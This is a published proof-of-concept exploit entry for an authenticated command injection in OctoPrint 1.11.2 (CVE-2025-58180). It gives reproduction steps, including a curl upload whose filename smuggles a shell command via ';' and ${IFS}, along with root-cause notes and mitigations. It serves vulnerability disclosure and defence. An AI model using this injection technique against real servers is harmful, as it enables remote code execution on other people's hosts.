# Exploit Title: OctoPrint 1.11.2 - File Upload # Date: 2025-09-28 # Exploit Author: prabhatverma.addada # Vendor Homepage: https://octoprint.org # Software Link: https://github.com/OctoPrint/OctoPrint # Affected Version(s): <= 1.11.2 # Patched Version(s): 1.11.3 # CVE: CVE-2025-58180 # CVSS (per advisory): 7.5 # Platform: Linux / OctoPrint server # Type: Remote Code Execution (requires authenticated upload / API key or session) # # Short description: # An authenticated attacker with file-upload access can craft a filename containing shell metacharacters (e.g. ';', ${IFS}) which bypasses filename # sanitization and, when interpolated into a configured system event handler command, results in arbitrary command execution on the host. # # Scope & privileges: # - Trigger privileges: Authenticated file-upload (API key or valid session). NO admin/root required to trigger the attack. # - Precondition: A system event handler that executes shell commands using filename/path placeholders must be configured by an administrator. # # Tested on: # - OctoPrint 1.11.2 running via `octoprint serve --port 5000` on Ubuntu 22.04 # # Reproduction / PoC (manual): # # 1) Start OctoPrint 1.11.2: # octoprint serve --port 5000 --debug # Complete initial setup at http://127.0.0.1:5000 and create an admin user. # # 2) Configure a system event handler that runs shell commands with filename placeholders: # Edit ~/.octoprint/config.yaml and add: # # events: # enabled: true # subscriptions: # - event: FileAdded # type: system # debug: true # command: "{path}" # # Restart OctoPrint. # # 3) Create a harmless test gcode: # mkdir -p /tmp/gcode # cat > /tmp/gcode/ok.gcode <<'EOF' # ; minimal gcode # G28 # M105 # EOF # # 4) Obtain API key from Settings -> API and export it: # export API_KEY='<your_api_key_here>' # # 5) Ensure target proof file does not exist: # ls -la /tmp/test123 # # 6) PoC upload (non-destructive proof): # INJECT_NAME='octo;touch${IFS}/tmp/test123;#.gcode' # # curl -sS -X POST -H "X-Api-Key: $API_KEY" \ # -F "file=@/tmp/gcode/ok.gcode;filename=\"${INJECT_NAME}\"" \ # "http://127.0.0.1:5000/api/files/local" # # 7) Verify execution: # ls -la /tmp/test123 # If /tmp/test123 exists, the injected command executed and RCE is demonstrated. # # Explanation: # - OctoPrint accepted the uploaded filename (sanitize_name allowed these characters in default config). # - FileAdded event payload contains the filename/path. # - A system event subscriber executed a shell command with that placeholder via subprocess with shell=True and without placeholder escaping. # - Shell metacharacters in the filename are interpreted by the shell and executed. # # Mitigations / Workarounds: # - Upgrade OctoPrint to 1.11.3 (patched). # - Disable event handlers using filename placeholders (set enabled: false or uncheck in GUI Event Manager). # - Set feature.enforceReallyUniversalFilenames: true in config.yaml and vet existing uploads. # - Do not expose OctoPrint to hostile networks; restrict upload access. # # References: # - GitHub Security Advisory: https://github.com/OctoPrint/OctoPrint/security/advisories/GHSA-49mj-x8jp-qvfc # - PoC repo: https://github.com/prabhatverma47/CVE-2025-58180 # # Notes for triage: # - Exploit requires only authenticated upload privileges to trigger. No admin/root required to perform the attack. # - PoC uses non-destructive `touch /tmp/test123`.